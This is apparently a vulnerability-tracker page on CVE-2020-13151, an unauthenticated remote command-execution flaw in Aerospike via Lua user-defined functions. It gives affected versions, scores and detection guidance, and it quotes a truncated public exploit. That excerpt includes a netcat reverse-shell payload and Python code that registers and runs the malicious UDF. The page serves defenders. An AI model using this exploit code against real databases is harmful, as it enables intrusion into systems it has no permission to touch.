CVE-2020-13151
published 2020-08-05CVE-2020-13151: Aerospike Community Edition 4.9.0.5 allows for unauthenticated submission and execution of user-defined functions (UDFs), written in Lua, as part of a database…
PriorityP185critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
EXPLOIT
EPSS
86.75%
99.7th percentile
Aerospike Community Edition 4.9.0.5 allows for unauthenticated submission and execution of user-defined functions (UDFs), written in Lua, as part of a database query. It attempts to restrict code execution by disabling os.execute() calls, but this is insufficient. Anyone with network access can use a crafted UDF to execute arbitrary OS commands on all nodes of the cluster at the permission level of the user running the Aerospike service.
Affected
6 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| aerospike | aerospike_server | < 4.5.3.21 | 4.5.3.21 |
| aerospike | aerospike_server | >= 4.6.0.1 < 4.6.0.19 | 4.6.0.19 |
| aerospike | aerospike_server | >= 4.7.0.1 < 4.7.0.17 | 4.7.0.17 |
| aerospike | aerospike_server | >= 4.8.0.1 < 4.8.0.13 | 4.8.0.13 |
| aerospike | aerospike_server | >= 4.9.0.1 < 4.9.0.10 | 4.9.0.10 |
| aerospike | aerospike_server | >= 5.0.0.1 < 5.0.0.7 | 5.0.0.7 |
Detection & IOCsextracted from sources · hover to see the quote
- →Monitor Aerospike service (default port 3000/TCP) for unauthenticated UDF registration and execution requests, particularly submissions of Lua scripts invoking os.execute(). ↗
- →Detect UDF registration calls (udf_put) followed immediately by apply() calls referencing a module named 'poc' and function 'runCMD' — a strong indicator of CVE-2020-13151 exploitation. ↗
- →Alert on Aerospike UDF Lua scripts containing os.execute() calls submitted over the wire; the vulnerability bypasses the intended restriction of this function. ↗
- →Flag creation of files under /tmp (e.g., /tmp/ft) or writes to /root/.ssh/authorized_keys by the Aerospike service process, as these are post-exploitation artifacts from known PoC payloads. ↗
- →Correlate network connections from the Aerospike service process to external IPs/ports as indicators of reverse shell callbacks (both Python and netcat shells are supported by the public PoC). ↗
- →The Metasploit module targets Aerospike Community Edition without authentication; detect exploitation attempts against CE deployments on port 3000 where no auth is configured. ↗
- →GreyNoise is actively tagging IPs observed exploiting CVE-2020-13151; enrich alerts on inbound connections to port 3000 with GreyNoise context to identify known malicious scanners. ↗
- ·The exploit PoC defaults the Aerospike namespace to 'test' and the record set name to 'cve202013151'; real-world attackers may override these with --namespace and --setname arguments, so detection should not rely solely on these default values. ↗
- ·The Metasploit module was tested against Aerospike Community Edition 4.9.0.5, 4.9.0.11, and 5.0.0.10 on Ubuntu; the fix was introduced in version 5.1.0.3, so only versions prior to that are vulnerable. ↗
- ·The PoC uses a random 16-character alphanumeric string as the dummy record key by default, making the key value an unreliable detection signal. ↗
CVSS provenance
nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.010.0CRITICALAV:N/AC:L/Au:N/C:C/I:C/A:C
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Aerospike Database 5.1.0.3 - OS Command Execution
exploitdb·2020-11-17·CVSS 9.8
CVE-2020-13151 [CRITICAL] Aerospike Database 5.1.0.3 - OS Command Execution
Aerospike Database 5.1.0.3 - OS Command Execution
---
# Exploit Title: Aerospike Database 5.1.0.3 - OS Command Execution
# Date: 2020-08-01
# Exploit Author: Matt S
# Vendor Homepage: https://www.aerospike.com/
# Version: &1|nc {ip} {port} >/tmp/ft&'
def _get_client(cfg):
try:
return aerospike.client({
'hosts': [(cfg.ahost, cfg.aport)],
'policies': {'timeout': 8000}}).connect()
except Exception as e:
print(f"unable to access cluster @ {cfg.ahost}:{cfg.aport}\n{e.msg}")
def _send(client, cfg, _cmd):
try:
print(client.apply((cfg.namespace, cfg.setname, cfg.dummystring ), 'poc', 'runCMD', [_cmd]))
except Exception as e:
print(f"[-] UDF execution returned {e.msg}")
def _register_udf(client, cfg):
try:
client.udf_put(cfg.udfpath)
except Exception as e:
print(f"[-] whoops, couldn't registe
Metasploit
Aerospike Database UDF Lua Code Execution
metasploit
Aerospike Database UDF Lua Code Execution
Aerospike Database UDF Lua Code Execution
Aerospike Database versions before 5.1.0.3 permitted user-defined functions (UDF) to call the `os.execute` Lua function. This module creates a UDF utilising this function to execute arbitrary operating system commands with the privileges of the user running the Aerospike service. This module does not support authentication; however Aerospike Database Community Edition does not enable authentication by default. This module has been tested successfully on Ubuntu with Aerospike Database Community Edition versions 4.9.0.5, 4.9.0.11 and 5.0.0.10.
http://packetstormsecurity.com/files/160106/Aerospike-Database-5.1.0.3-Remote-Command-Execution.htmlhttp://packetstormsecurity.com/files/160451/Aerospike-Database-UDF-Lua-Code-Execution.htmlhttps://b4ny4n.github.io/network-pentest/2020/08/01/cve-2020-13151-poc-aerospike.htmlhttps://www.aerospike.com/docs/operations/configure/security/access-control/index.html#create-users-and-assign-roleshttps://www.aerospike.com/download/server/notes.html#5.1.0.3https://www.aerospike.com/enterprise/download/server/notes.html#5.1.0.3http://packetstormsecurity.com/files/160106/Aerospike-Database-5.1.0.3-Remote-Command-Execution.htmlhttp://packetstormsecurity.com/files/160451/Aerospike-Database-UDF-Lua-Code-Execution.htmlhttps://b4ny4n.github.io/network-pentest/2020/08/01/cve-2020-13151-poc-aerospike.htmlhttps://www.aerospike.com/docs/operations/configure/security/access-control/index.html#create-users-and-assign-roleshttps://www.aerospike.com/download/server/notes.html#5.1.0.3https://www.aerospike.com/enterprise/download/server/notes.html#5.1.0.3
2020-08-05
Published